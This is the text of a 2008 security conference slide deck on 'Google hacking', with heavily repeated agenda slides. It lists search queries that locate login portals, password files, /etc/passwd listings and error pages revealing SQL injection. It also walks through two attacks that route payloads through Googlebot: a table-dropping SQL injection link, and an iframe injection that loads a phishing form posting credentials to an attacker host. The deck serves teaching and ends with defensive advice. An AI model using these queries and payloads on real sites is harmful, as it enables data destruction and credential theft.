Download - CITEC #CON2-Dirty Attack with Google Hacking
Dirty Attacks with Google Hacking
Prathan Phongthiproek ACIS Professional Center Information Security Consultant – Penetration Tester November 16th, 2008
What I’ve done ?!
Penetration Testing (BlackBox and WhiteBox)
Security Consultant ( I Hate this job !!)
Active Security Researcher
Devoted Hacker
Exploits and Vulnerabilities Disclosure (CWH Underground)
Tools: g00mail Enumerator, SQLFuzzer, 4ppCrawl3r, Spike Bot (Developing) Etc..
Comments, Feedback ? >> [email protected] !
(Don’t spam mail !! lol)!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
-------------------------------- # w 03:19:18 up 1 min, 1 user, load average: 1.73, 0.71, 0.26 USER TTY FROM LOGIN@ IDLE JCPU PCPU prathan phongthiproek tty1 - 03:18 0.00s 0.08s 0.01s
What is Google Hacking ?!
It is NOT hacking into Google!! (Hacking Google: Sidejacking, XSS Spreadsheet, etc)
Google is much more than just a simple search interface and engine.
Google hacking is the use of a search engine to locate a security vulnerability on the Internet
Google crawls public websites for information using an automated search and record program called “Googlebot”.
IRC Bot using Google Hacking to find Vulnerability and Exploits
Refers to using the Google search engine in an effort to pull sensitive information, such as credit card numbers, out of a poorly constructed Web application !
Dirty Attacks
With
Google hacking
What is Google Hacking? What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
-------------------------------- Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
What is Google Hacking ?!
Johnny Long is the “grandfather” of Google hacking. His website http://johnny.ihackstuff.com is exclusively
dedicated to Google Hacking and you will find all sorts of cool information there.
Johnny Long • Wrote Google Hacking for Penetration Testers; ISBN
1597491764
What is Google Hacking? What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
-------------------------------- Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
With
Google hacking
What a Hacker Can do with Vulnerable Web ? !
When an attacker knows the sort of vulnerability he !
wants to exploit but has no specific target, The Best Solu-on is “Dirty Google Search operators”
File Inclusion (RFI, LFI) SQL Injection Remote Code Execution Arbitrary Add Admin Arbitrary File Upload XSS / XSRF Directory Listing Directory Traversal Source code disclosure Administrative Login Portals Web server Information Reveal Pathnames and Filenames Social Engineering (Damn !! How do you get my address)
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Hacking Database (GHDB) !
We call them “googledorks” : Inept or foolish people as revealed by Google.
Advisories and Vulnerabilities Error Messages that contain too much information Files containing usernames and passwords Footholds and juicy Info Pages containing login portals Pages containing network or vulnerability data Sensitive Directories Sensitive Online Shopping Info Vulnerable Files and Servers Web Server Detection
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB) --------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Hacking Database (GHDB) !
h;p://johnny.ihackstuff.com/ghdb.php.
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB) --------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Hacking Database (GHDB) !
Pages containing login portals
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB) --------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Hacking Database (GHDB) !
in-tle:"ColdFusion Administrator Login"
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB) --------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Hacking Database (GHDB) !
“ColdFusion Administrator Login"
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB) --------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Hacking basics!
Crawl Website Informa-on with Caches
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Hacking basics!
Using Google as a Proxy Server
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Hacking basics!
Basic Search Operators
Use the plus sign (+) to force a search for an overly common word
Use the minus sign (-) to exclude a term from a search
(|) / OR, admin | administrator To search for a phrase, supply the phrase
surrounded by double quotes (" ") A period (.) serves as a single-character wildcard. An asterisk (*) represents any word - not the
completion of a word, as is traditionally used Mixed searches, Can involve both phrases and
individual terms
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Advanced Operators!
Advanced Search Operators
filetype: info: define: intext: inurl: intitle: inanchor: link: site: stocks: cache:
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Advanced Operators!
Website Informa-on Gathering – “site:www.amazon.com” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Advanced Operators!
Subdomains Gathering – “site:amazon.com –site:www.amazon.com” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Advanced Operators!
Website containing Error Message – “Error | Warning site:…” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Advanced Operators!
Directory Lis-ng – in-tle:index.of admin !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Advanced Operators!
Directory Lis-ng – in-tle:index.of WS_FTP.LOG !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Advanced Operators!
Web server Informa-on – in-tle:index.of “Server at” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Advanced Operators!
Administra-ve Login Portals – “admin login” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Advanced Operators!
File robots.txt – “inurl:robots.txt” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Advanced Operators!
Vulnerable File (Robpoll.cgi) – “inurl:robpoll.cgi filetype:cgi” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Advanced Operators!
File containing password – “AutoCreate=TRUE password=*”!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Advanced Operators!
MS Access DB password – “inurl:admin mdb”!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Advanced Operators!
MS Access DB password – “inurl:admin mdb”!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Advanced Operators!
Password File – “index of /etc" passwd !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Google Advanced Operators!
Crack / Keygen… – 94FBR sobware!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Locating Exploits and Finding Targets !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Loca-ng Exploits Via Common Code Strings
Another way to locate exploit code is to focus on common strings within the source code itself
One way to do this is to focus on common inclusions or header file references
For Example, many C programs include the standard input/output library functions, which are references by an include statement such as #include <stdio.h> within the source code
A query like this would locate C source code that contained the word exploit, regardless of the file’s extension:
“#include <stdio.h>” exploit
Locating Exploits and Finding Targets !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Loca-ng Exploits Via Common Code Strings
Locating Exploits and Finding Targets !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Loca-ng Exploits Via Common Code Strings
Locating Exploits and Finding Targets !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Loca-ng Targets Via Demonstra-on Pages
Develop a query string to locate vulnerable targets on the Web; the vendor’s Website is a good place to discover what exactly the product’s Web pages look like
For Example, some administrators might modify the format of a vendor-supplied Web page to fit the theme of the site
These types of modifications can impact the effectiveness of a Google search that targets a vendor-supplied page format
You can find that most sites look very similar and that nearly every site has a “Powered by” message at the bottom of the main page
Locating Exploits and Finding Targets !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Loca-ng Targets Via Source Code
A hacker might use the source code of a program to discover ways to search for that software with Google
To find the best search string to locate potentially vulnerable targets, you can visit the Web page of the software vendor to find the source code of the offending software
In case where source code is not available, an attacker might opt to simply download the offending software and run it on a machine he controls to get ideas for potential searches
Locating Exploits and Finding Targets !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Vulnerable Web Applica-on Examples!
Locating Exploits and Finding Targets !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Vulnerable Web Applica-on Examples!
Locating Exploits and Finding Targets !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Finding targets via “powered by” – “Powered By cubecart”
Tracking Down Web Servers, Log Portals, etc..!Query for “Microsob-‐IIS/5.0 Server at” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
Tracking Down Web Servers, Log Portals, etc..!IIS HTTP/1.1 Error Page Titles !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
Tracking Down Web Servers, Log Portals, etc..!Query for IIS 5.0 – intext:“404 Object Not Found” Microsob
IIS/5.0!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
Tracking Down Web Servers, Log Portals, etc..!Query for “Apache” “Server at” –in-tle:index.of in-tle:error !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
Tracking Down Web Servers, Log Portals, etc..!Apache 2.0 Error Pages!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
Tracking Down Web Servers, Log Portals, etc..!Default Pages for Web Servers!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
Tracking Down Web Servers, Log Portals, etc..!
Outlook Web Access Default Portal – inurl:“exchange/logon.asp”!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
Tracking Down Web Servers, Log Portals, etc..!Windows Registry Entries Can Reveal Passwords – filetype:reg
intext:"internet account manager"!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
Tracking Down Web Servers, Log Portals, etc..!Error Message for File Inclusion – “Warning: Failed opening" !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
Tracking Down Web Servers, Log Portals, etc..!Error Message for File Inclusion – “Warning: Failed opening" !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
Tracking Down Web Servers, Log Portals, etc..!Error Message for SQL Injec-on – “Microsob OLE DB Provider
for ODBC Drivers error” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
Tracking Down Web Servers, Log Portals, etc..!Error Message for SQL Injec-on – “Microsob OLE DB Provider
for ODBC Drivers error” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
Tracking Down Web Servers, Log Portals, etc..!
Error Message for XSS/XSRF – inurl:“error.asp?msg=” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
Dirty Attacks using Googlebot!
Googlebot, Google’s Web Crawler!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot Google Hacking Tools
--------------------------------
<a href=http://www.mict.go.th>MICT</a>
Dirty Attacks using Googlebot!Google’s Query Processor!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot Google Hacking Tools
--------------------------------
Dirty Attacks using Googlebot!Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot Google Hacking Tools
--------------------------------
SQL Injec-on via Googlebot
We search in Google one of signatures: inurl:”.asp?id=“,inurl:”?name=“,”Microsoft OLE DB Provider for SQL Server”
Finding the link: http://www.hackme.com/cat.asp?ID=1
Create the file test.html the code is: <html> <a href=“http://www.hackme.com/cat.asp?
ID=1+drop+table+’users’—”>Click Here</a> </html>
Dirty Attacks using Googlebot!Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot Google Hacking Tools
--------------------------------
SQL Injec-on via Googlebot
Then upload to: http://www.mysite.com/test.html After a few days GoogleBot will index the file: http://www.mysite.com/test.html Then index the link “Click Here” inside the file:
http://www.hackme.com/cat.asp?ID=1+drop+table+’users’—
The application SQL query is: SELECT Username FROM users WHERE ID=1
drop table ‘users’— The Result: The table “users” has been deleted,
thanks to Google
Dirty Attacks using Googlebot!Google’s Query Processor!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot Google Hacking Tools
--------------------------------
<a href=“http://www.hackeme.com/cat.asp?ID=1+drop+table+’users’—”>Click Here</a>
<a href=“http://www.hackeme.com/cat.asp?ID=1+drop+table+’users’—”>Click Here</a>
/cat.asp?ID=1+drop+table+’users’—
Dirty Attacks using Googlebot!Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot Google Hacking Tools
--------------------------------
Cross Site Framing via Googlebot
We search in Google one of signatures: inurl:”.asp?msg=“,inurl:”.asp?title=“,..
We find the link: http://www.CITEC.com/bank/Login.asp?MsgError=Access
denied Create the file 1.html the code is:
<html> <title>CITEC Bank | Login CITEC | CITEC Account</
title> <a href=“http://www.CITEC.com/bank/Login.asp?
MsgError=<iframe src=‘http://www.social.com/2.html’></iframe>”>CITEC Bank</a>
</html>
Dirty Attacks using Googlebot!Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot Google Hacking Tools
--------------------------------
Cross Site Framing via Googlebot
And the file 2.html <form method=“post” action=“http://www.social.com/1.php>
Username: <input type=“text” name=“user”><br> Password: <input type=“password” name=“pass”>
<input type=“submit” value=“Send”> </form>
Then upload All The Files to: http://www.social.com/
Dirty Attacks using Googlebot!Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot Google Hacking Tools
--------------------------------
Cross Site Framing via Googlebot
After a few days GoogleBot will index the file: http://www.social.com/1.html
Then will index the link “CITEC Bank”(that within the file):
http://www.CITEC.com/bank/Login.asp?MsgError=<iframe src=‘http://www.social.com/2.html’></iframe>
Dirty Attacks using Googlebot!Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot Google Hacking Tools
--------------------------------
Cross Site Framing via Googlebot
The users that search “CITEC Bank” will find the above link and when getting inside the link they will see this form:
The Result: Many Users are being Manipulated by the attacker which uses Google in order to execute a Phishing attack (with XSS).
Google Hacking Tools!
Google Hacking Database (GHDB)!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
Google Hacking Tools!
Gooscan !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
Google Hacking Tools!
SiteDigger Tools !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
Google Hacking Tools!
Goolink – This is very handy for finding vulnerable site wide open to google and googlebots!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
Google Hacking Tools!
GoolagScanner – Enable to Audit Website via Google!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
Spike Bot – (By Me ) !
Google Links with Spike Bot !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
How to Protect Google Hacking!
Keep sensitive data off the web Use common sense!! Basic security practices is all it
takes. Defense in depth, act diligently when configuring web based devices and have a strong corporate security policy
Use Google hacking techniques to uncover your own security problems. So…..Google hack yourself!
